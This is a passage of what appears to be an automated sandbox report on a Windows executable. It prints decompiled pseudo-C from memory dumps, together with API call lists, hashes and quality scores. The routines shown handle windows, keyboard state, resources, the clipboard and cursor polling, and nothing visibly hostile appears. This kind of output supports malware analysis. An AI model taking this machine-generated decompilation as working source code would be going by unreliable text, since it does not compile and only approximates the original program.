                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045660C), ref: 00455FE0
                                                                        • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00455FF5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                        • String ID:
                                                                        • API String ID: 1720852555-0
                                                                        • Opcode ID: b48ccbd9e52d11f199ade556474468208e195aba5749c43cad4d731812e387f2
                                                                        • Instruction ID: b2ee28d00e52b312a41b956d375fa097b9583cfbf8aa8feeee27d57160c9c8e9
                                                                        • Opcode Fuzzy Hash: b48ccbd9e52d11f199ade556474468208e195aba5749c43cad4d731812e387f2
                                                                        • Instruction Fuzzy Hash: 9B1133716102009BDF14FE69C9C5B5B37A8AF08305F4414AAFE04DF287D679EC448714
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00427418(void* __edi, struct HWND__* _a4, signed int _a8) {
                                                                        				struct _WINDOWPLACEMENT _v48;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t21;
                                                                        				struct HWND__* _t23;
                                                                        
                                                                        				_t19 = _a8;
                                                                        				_t23 = _a4;
                                                                        				if( *0x496ac5 != 0) {
                                                                        					if((_t19 & 0x00000003) == 0) {
                                                                        						if(IsIconic(_t23) == 0) {
                                                                        							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                                                        						} else {
                                                                        							GetWindowPlacement(_t23,  &_v48);
                                                                        						}
                                                                        						return E00427388( &(_v48.rcNormalPosition), _t19);
                                                                        					}
                                                                        					return 0x12340042;
                                                                        				}
                                                                        				_t21 =  *0x496aa0; // 0x427418
                                                                        				 *0x496aa0 = E00427218(1, _t19, _t21, __edi, _t23);
                                                                        				return  *0x496aa0(_t23, _t19);
                                                                        			}










                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressProc
                                                                        • String ID: MonitorFromWindow
                                                                        • API String ID: 190572456-2842599566
                                                                        • Opcode ID: 3bac1d995916bae630dc8399e42a92fe996f45957db1b53e04f404f2ee8b6375
                                                                        • Instruction ID: 35f16ded1955c2ed148f5dea8e37f92aac6793c71a0f0adcbddfe092b0b16418
                                                                        • Opcode Fuzzy Hash: 3bac1d995916bae630dc8399e42a92fe996f45957db1b53e04f404f2ee8b6375
                                                                        • Instruction Fuzzy Hash: AE01A2717081289AD700FB50AC81DEB775DEB11358B848137F815A3242D73CA90187AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00459724(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v268;
                                                                        				char _v508;
                                                                        				char _v524;
                                                                        				char _v528;
                                                                        				char _v532;
                                                                        				char _v536;
                                                                        				char _v540;
                                                                        				char _v544;
                                                                        				void* _t75;
                                                                        				intOrPtr _t91;
                                                                        				char* _t97;
                                                                        				signed int _t107;
                                                                        				signed int _t114;
                                                                        				intOrPtr _t121;
                                                                        				intOrPtr _t133;
                                                                        				intOrPtr _t135;
                                                                        				intOrPtr _t146;
                                                                        				int _t152;
                                                                        				intOrPtr _t153;
                                                                        				void* _t163;
                                                                        				void* _t164;
                                                                        				intOrPtr _t165;
                                                                        
                                                                        				_t163 = _t164;
                                                                        				_t165 = _t164 + 0xfffffde4;
                                                                        				_v544 = 0;
                                                                        				_v540 = 0;
                                                                        				_v536 = 0;
                                                                        				_v532 = 0;
                                                                        				_v528 = 0;
                                                                        				_t133 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t163);
                                                                        				_push(0x459984);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t165;
                                                                        				if(__edx >= 1) {
                                                                        					E004591EC(_v8,  &_v528);
                                                                        					if(E0040A9F8(_v528, _t133) == 1) {
                                                                        						_t133 = _t133 - 1;
                                                                        					}
                                                                        				}
                                                                        				_v12 = _t133;
                                                                        				if(E00459504(_v8) == 0) {
                                                                        					__eflags = _v12;
                                                                        					if(_v12 < 0) {
                                                                        						__eflags = 0;
                                                                        						_v12 = 0;
                                                                        					}
                                                                        					E004591EC(_v8,  &_v540);
                                                                        					_t75 = E00404600(_v540);
                                                                        					__eflags = _t75 - _v12;
                                                                        					if(_t75 <= _v12) {
                                                                        						E004591EC(_v8,  &_v544);
                                                                        						_v12 = E00404600(_v544);
                                                                        					}
                                                                        					E00459700(_v8, _v12, _v12);
                                                                        					goto L21;
                                                                        				} else {
                                                                        					if(_v12 < 0) {
                                                                        						_v12 = 0;
                                                                        					}
                                                                        					_t135 = _v12 + 1;
                                                                        					E004591EC(_v8,  &_v532);
                                                                        					if(_t135 < E00404600(_v532)) {
                                                                        						E004591EC(_v8,  &_v536);
                                                                        						asm("bt [edx], eax");
                                                                        						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
                                                                        							_t135 = _t135 + 1;
                                                                        						}
                                                                        					}
                                                                        					_t24 = _v8 + 0x228; // 0xba6855c0
                                                                        					_t91 =  *_t24;
                                                                        					if(_t91 <= _v12) {
                                                                        						_v12 = _t91;
                                                                        						_t135 = _v12;
                                                                        					}
                                                                        					E00459700(_v8, _t135, _t135);
                                                                        					if(_t135 == _v12) {
                                                                        						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
                                                                        						L21:
                                                                        						__eflags = 0;
                                                                        						_pop(_t146);
                                                                        						 *[fs:eax] = _t146;
                                                                        						_push(0x45998b);
                                                                        						return E0040436C( &_v544, 5);
                                                                        					} else {
                                                                        						GetKeyboardState( &_v268);
                                                                        						_t152 = 0x100;
                                                                        						_t97 =  &_v524;
                                                                        						do {
                                                                        							 *_t97 = 0;
                                                                        							_t97 = _t97 + 1;
                                                                        							_t152 = _t152 - 1;
                                                                        							_t177 = _t152;
                                                                        						} while (_t152 != 0);
                                                                        						_v508 = 0x81;
                                                                        						 *((char*)(_t163 + ( *(0x47ac20 + (E004037D8(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
                                                                        						SetKeyboardState( &_v524);
                                                                        						 *((char*)(_v8 + 0x23c)) = 1;
                                                                        						_push(_t163);
                                                                        						_push(0x4598f2);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t165;
                                                                        						_t107 = E004037D8(_v8, _t177);
                                                                        						SendMessageA(E0043CC2C(_v8), 0x100,  *(0x47ac20 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
                                                                        						_t114 = E004037D8(_v8, _t177);
                                                                        						SendMessageA(E0043CC2C(_v8), 0x101,  *(0x47ac20 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
                                                                        						_pop(_t153);
                                                                        						 *[fs:eax] = _t153;
                                                                        						_push(0x4598f9);
                                                                        						_t121 = _v8;
                                                                        						 *((char*)(_t121 + 0x23c)) = 0;
                                                                        						return _t121;
                                                                        					}
                                                                        				}
                                                                        			}



























                                                                        APIs
                                                                        • GetKeyboardState.USER32(?,00000000,00459984), ref: 0045981F
                                                                        • SetKeyboardState.USER32(00000081), ref: 00459863
                                                                        • SendMessageA.USER32 ref: 004598A8
                                                                        • SendMessageA.USER32 ref: 004598D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: KeyboardMessageSendState
                                                                        • String ID:
                                                                        • API String ID: 1999190242-0
                                                                        • Opcode ID: fad6d155a161e0a0ec6beaff0b0cd5eee778928cfc5a025ab2d6d9f425fb3a4f
                                                                        • Instruction ID: 0a00c29b07d859761f66e24d50c690cbb1c1765d6d02b1fe706050cb4a926a74
                                                                        • Opcode Fuzzy Hash: fad6d155a161e0a0ec6beaff0b0cd5eee778928cfc5a025ab2d6d9f425fb3a4f
                                                                        • Instruction Fuzzy Hash: 07614D74A00618EFDB10EF69C985ADDB7B4EB59304F2045EAE804A7392D7386F84DB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00417214(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                                                        				CHAR* _v8;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t18;
                                                                        				void* _t23;
                                                                        				CHAR* _t24;
                                                                        				void* _t25;
                                                                        				struct HRSRC__* _t29;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t31;
                                                                        				void* _t32;
                                                                        
                                                                        				_v8 = _t24;
                                                                        				_t31 = __edx;
                                                                        				_t23 = __eax;
                                                                        				_t29 = FindResourceA(__edx, _v8, _a4);
                                                                        				 *(_t23 + 0x10) = _t29;
                                                                        				_t33 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					E004171A4(_t23, _t24, _t29, _t31, _t33, _t32);
                                                                        					_pop(_t24);
                                                                        				}
                                                                        				_t5 = _t23 + 0x10; // 0x416fb4
                                                                        				_t30 = LoadResource(_t31,  *_t5);
                                                                        				 *(_t23 + 0x14) = _t30;
                                                                        				_t34 = _t30;
                                                                        				if(_t30 == 0) {
                                                                        					E004171A4(_t23, _t24, _t30, _t31, _t34, _t32);
                                                                        				}
                                                                        				_t7 = _t23 + 0x10; // 0x416fb4
                                                                        				_push(SizeofResource(_t31,  *_t7));
                                                                        				_t8 = _t23 + 0x14; // 0x416ad4
                                                                        				_t18 = LockResource( *_t8);
                                                                        				_pop(_t25);
                                                                        				return E00416F74(_t23, _t25, _t18);
                                                                        			}

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 0041722B
                                                                        • LoadResource.KERNEL32(?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 00417245
                                                                        • SizeofResource.KERNEL32(?,00416FB4,?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 0041725F
                                                                        • LockResource.KERNEL32(00416AD4,00000000,?,00416FB4,?,00416FB4,?,?,?,004123F4,?,00000001,00000000,?,00417184,?), ref: 00417269
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                        • String ID:
                                                                        • API String ID: 3473537107-0
                                                                        • Opcode ID: 005317863e8cff03af0266735c1d7592115360119c5bcdfeb6093ed02da14767
                                                                        • Instruction ID: 3290e5c036addd08ea02881163b77e979cd31cb4f03c08ba38f160ae1e3d6bef
                                                                        • Opcode Fuzzy Hash: 005317863e8cff03af0266735c1d7592115360119c5bcdfeb6093ed02da14767
                                                                        • Instruction Fuzzy Hash: F9F04BB26052046F9704EE5EA881D9B77ECEE89364311416AF909D7202DA39ED518768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00430D08(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				CHAR* _t20;
                                                                        				long _t25;
                                                                        				intOrPtr _t30;
                                                                        				void* _t34;
                                                                        				intOrPtr _t37;
                                                                        
                                                                        				_push(0);
                                                                        				_t34 = __eax;
                                                                        				_push(_t37);
                                                                        				_push(0x430d85);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t37;
                                                                        				E00430754(__eax);
                                                                        				_t25 = GetTickCount();
                                                                        				do {
                                                                        					Sleep(0);
                                                                        				} while (GetTickCount() - _t25 <= 0x3e8);
                                                                        				E004303AC(_t34, _t25,  &_v8, 0, __edi, _t34);
                                                                        				if(_v8 != 0) {
                                                                        					_t20 = E004047F8(_v8);
                                                                        					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                                                                        				}
                                                                        				_pop(_t30);
                                                                        				 *[fs:eax] = _t30;
                                                                        				_push(0x430d8c);
                                                                        				return E00404348( &_v8);
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00430754: WinHelpA.USER32 ref: 00430763
                                                                        • GetTickCount.KERNEL32 ref: 00430D26
                                                                        • Sleep.KERNEL32(00000000,00000000,00430D85,?,?,00000000,00000000,?,00430CFB), ref: 00430D2F
                                                                        • GetTickCount.KERNEL32 ref: 00430D34
                                                                        • WinHelpA.USER32 ref: 00430D6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CountHelpTick$Sleep
                                                                        • String ID:
                                                                        • API String ID: 2438605093-0
                                                                        • Opcode ID: b159ed8da29f14084cdfe4b7c42b37775e2f4efdee277ec71451ef76ad6eb451
                                                                        • Instruction ID: 728367182c2a4c0d1575522e4c38db70398e5defa9278ae5990baf4831071f11
                                                                        • Opcode Fuzzy Hash: b159ed8da29f14084cdfe4b7c42b37775e2f4efdee277ec71451ef76ad6eb451
                                                                        • Instruction Fuzzy Hash: D701A270700204AFE711FBA6CC52B5DB2E8DB4C704F52567BF500A75C1DA79AE009969
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0043A6DC(void* __eax, intOrPtr* __edx) {
                                                                        				char _v20;
                                                                        				char _v28;
                                                                        				void* __edi;
                                                                        				intOrPtr _t17;
                                                                        				void* _t19;
                                                                        				void* _t21;
                                                                        				void* _t32;
                                                                        				void* _t39;
                                                                        				void* _t45;
                                                                        				intOrPtr _t47;
                                                                        				intOrPtr _t48;
                                                                        				void* _t50;
                                                                        				void* _t51;
                                                                        				void* _t65;
                                                                        				intOrPtr* _t66;
                                                                        				intOrPtr* _t68;
                                                                        				void* _t69;
                                                                        
                                                                        				_t68 = __edx;
                                                                        				_t50 = __eax;
                                                                        				_t17 =  *__edx;
                                                                        				_t69 = _t17 - 0x84;
                                                                        				if(_t69 > 0) {
                                                                        					_t19 = _t17 + 0xffffff00 - 9;
                                                                        					if(_t19 < 0) {
                                                                        						_t21 = E00436D1C(__eax);
                                                                        						if(_t21 != 0) {
                                                                        							L28:
                                                                        							return _t21;
                                                                        						}
                                                                        						L27:
                                                                        						return E0043782C(_t50, _t68);
                                                                        					}
                                                                        					if(_t19 + 0xffffff09 - 0xb < 0) {
                                                                        						_t21 = E0043A648(__eax, _t51, __edx);
                                                                        						if(_t21 == 0) {
                                                                        							goto L27;
                                                                        						}
                                                                        						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
                                                                        							goto L28;
                                                                        						}
                                                                        						_t21 = E0043CF30(_t50);
                                                                        						if(_t21 == 0) {
                                                                        							goto L28;
                                                                        						}
                                                                        						_push( *((intOrPtr*)(_t68 + 8)));
                                                                        						_push( *((intOrPtr*)(_t68 + 4)));
                                                                        						_push( *_t68);
                                                                        						_t32 = E0043CC2C(_t50);
                                                                        						_push(_t32);
                                                                        						L00406D8C();
                                                                        						return _t32;
                                                                        					}
                                                                        					goto L27;
                                                                        				}
                                                                        				if(_t69 == 0) {
                                                                        					_t21 = E0043782C(__eax, __edx);
                                                                        					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                                                        						goto L28;
                                                                        					}
                                                                        					E00407314( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                                                        					E004360F0(_t50,  &_v28,  &_v20);
                                                                        					_t21 = E0043A5B4(_t50, 0,  &_v28, _t65, 0);
                                                                        					if(_t21 == 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t68 + 0xc)) = 1;
                                                                        					return _t21;
                                                                        				}
                                                                        				_t39 = _t17 - 7;
                                                                        				if(_t39 == 0) {
                                                                        					_t66 = E0044DA34(__eax);
                                                                        					if(_t66 == 0) {
                                                                        						goto L27;
                                                                        					}
                                                                        					_t21 =  *((intOrPtr*)( *_t66 + 0xe4))();
                                                                        					if(_t21 == 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        					goto L27;
                                                                        				}
                                                                        				_t21 = _t39 - 1;
                                                                        				if(_t21 == 0) {
                                                                        					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        				} else {
                                                                        					if(_t21 == 0x17) {
                                                                        						_t45 = E0043CC2C(__eax);
                                                                        						if(_t45 == GetCapture() &&  *0x47a96c != 0) {
                                                                        							_t47 =  *0x47a96c; // 0x0
                                                                        							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                                                        								_t48 =  *0x47a96c; // 0x0
                                                                        								E00437760(_t48, 0, 0x1f, 0);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Capture
                                                                        • String ID:
                                                                        • API String ID: 1145282425-3916222277
                                                                        • Opcode ID: c6b065f950aeea42138e2c2433ce8e98d842ebbd617e3b1284dea8e207de2a66
                                                                        • Instruction ID: 12ac0fe7456563294c718b5602fa9538c711e14ac05094fc64cad230b781499c
                                                                        • Opcode Fuzzy Hash: c6b065f950aeea42138e2c2433ce8e98d842ebbd617e3b1284dea8e207de2a66
                                                                        • Instruction Fuzzy Hash: C5318E707402005BC728BA39898566A22959B4D318F14B93FB4D6D7396DA3CCC66C78B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004233B4(intOrPtr* __eax, void* __ecx, void* __edx) {
                                                                        				intOrPtr _v68;
                                                                        				intOrPtr _v72;
                                                                        				intOrPtr _v76;
                                                                        				struct tagENHMETAHEADER _v104;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t35;
                                                                        				intOrPtr* _t37;
                                                                        				struct HENHMETAFILE__* _t43;
                                                                        				intOrPtr _t44;
                                                                        
                                                                        				_t37 = __eax;
                                                                        				_t43 = GetClipboardData(0xe);
                                                                        				if(_t43 == 0) {
                                                                        					_t35 =  *0x495ae0; // 0x41d524
                                                                        					E004209F0(_t35);
                                                                        				}
                                                                        				E00422B88(_t37);
                                                                        				_t44 =  *((intOrPtr*)(_t37 + 0x28));
                                                                        				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
                                                                        				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
                                                                        				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
                                                                        				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
                                                                        				 *((short*)(_t44 + 0x18)) = 0;
                                                                        				 *((char*)(_t37 + 0x2c)) = 1;
                                                                        				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
                                                                        				return  *((intOrPtr*)( *_t37 + 0x10))();
                                                                        			}













                                                                        APIs
                                                                        • GetClipboardData.USER32 ref: 004233C1
                                                                        • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 004233E3
                                                                        • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 004233F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileMeta$ClipboardCopyDataHeader
                                                                        • String ID:
                                                                        • API String ID: 1752724394-0
                                                                        • Opcode ID: 584a0899f4454c9ff22cde47aa0bf1c7314bbfefc93f0f0ebb0ed237522287c3
                                                                        • Instruction ID: 046aa751e527933c7b20a5c02d24ec073801e8f6abf4c557e599ba6369277cb7
                                                                        • Opcode Fuzzy Hash: 584a0899f4454c9ff22cde47aa0bf1c7314bbfefc93f0f0ebb0ed237522287c3
                                                                        • Instruction Fuzzy Hash: 4E117C717003048FC710DF6AC885A9ABBF8AF49310F51467AE909DB252DB75EC058B98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00454E54() {
                                                                        				struct tagPOINT _v12;
                                                                        				void* _t5;
                                                                        				long _t6;
                                                                        
                                                                        				 *0x496c14 = GetCurrentThreadId();
                                                                        				L5:
                                                                        				_t5 =  *0x496c18; // 0x0
                                                                        				_t6 = WaitForSingleObject(_t5, 0x64);
                                                                        				if(_t6 == 0x102) {
                                                                        					if( *0x496c04 != 0 &&  *((intOrPtr*)( *0x496c04 + 0x60)) != 0) {
                                                                        						GetCursorPos( &_v12);
                                                                        						if(E00434E24( &_v12) == 0) {
                                                                        							E004571F4( *0x496c04);
                                                                        						}
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				return _t6;
                                                                        			}







                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454E60
                                                                        • GetCursorPos.USER32(?), ref: 00454E7D
                                                                        • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00454E9D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CurrentCursorObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 1359611202-0
                                                                        • Opcode ID: 2181e533a6cec7c1c80d86737d6f4b9c07e79e28550219c8533fb89150b3b8bd
                                                                        • Instruction ID: d492c6761d47016650798b2a4f2e7253e3df892c5a842f98240a92612d232fcb
                                                                        • Opcode Fuzzy Hash: 2181e533a6cec7c1c80d86737d6f4b9c07e79e28550219c8533fb89150b3b8bd
                                                                        • Instruction Fuzzy Hash: 1EF0B4321042059ADF20E799D887B5633E8FB44309F010077E9009E2D2DB7D98C5C71D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0043BDB0(intOrPtr* __eax, intOrPtr __edx) {
                                                                        				intOrPtr _v8;
                                                                        				void* __ecx;
                                                                        				void* _t25;
                                                                        				intOrPtr* _t31;
                                                                        				void* _t34;
                                                                        				intOrPtr* _t37;
                                                                        				void* _t45;
                                                                        
                                                                        				_v8 = __edx;
                                                                        				_t37 = __eax;
                                                                        				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
                                                                        					L8:
                                                                        					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
                                                                        						L10:
                                                                        						return  *((intOrPtr*)( *_t37 - 0x10))();
                                                                        					}
                                                                        					_t25 = E0043BD00(_t37, _t45);
                                                                        					if(_t25 == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        				} else {
                                                                        					_t31 =  *0x495ad0; // 0x496c04
                                                                        					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
                                                                        						goto L8;
                                                                        					} else {
                                                                        						_t34 = E0044DA34(_t37);
                                                                        						_t44 = _t34;
                                                                        						if(_t34 == 0) {
                                                                        							goto L8;
                                                                        						} else {
                                                                        							_t25 = E00437760(_t44, 0, 0xb017, _v8);
                                                                        							if(_t25 == 0) {
                                                                        								goto L8;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t25;
                                                                        			}











                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CaptureIconic
                                                                        • String ID:
                                                                        • API String ID: 2277910766-0
                                                                        • Opcode ID: 87fd33f331bf0354e6fdcf0377d194eb44efd1ead2dc2f90263fdd11b2e56acc
                                                                        • Instruction ID: 3b1b24bba76df9106612dd079887cf6aa0e728384a99efc309afd5cd92888748
                                                                        • Opcode Fuzzy Hash: 87fd33f331bf0354e6fdcf0377d194eb44efd1ead2dc2f90263fdd11b2e56acc
                                                                        • Instruction Fuzzy Hash: BC110035B00205DBDB24EB9DE586AAA73E4EF08304F2460B7E604DF352D778ED409798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00420A80(void* __ebx) {
                                                                        				char _v260;
                                                                        				char _v264;
                                                                        				long _t21;
                                                                        				void* _t22;
                                                                        				intOrPtr _t27;
                                                                        				void* _t32;
                                                                        
                                                                        				_v264 = 0;
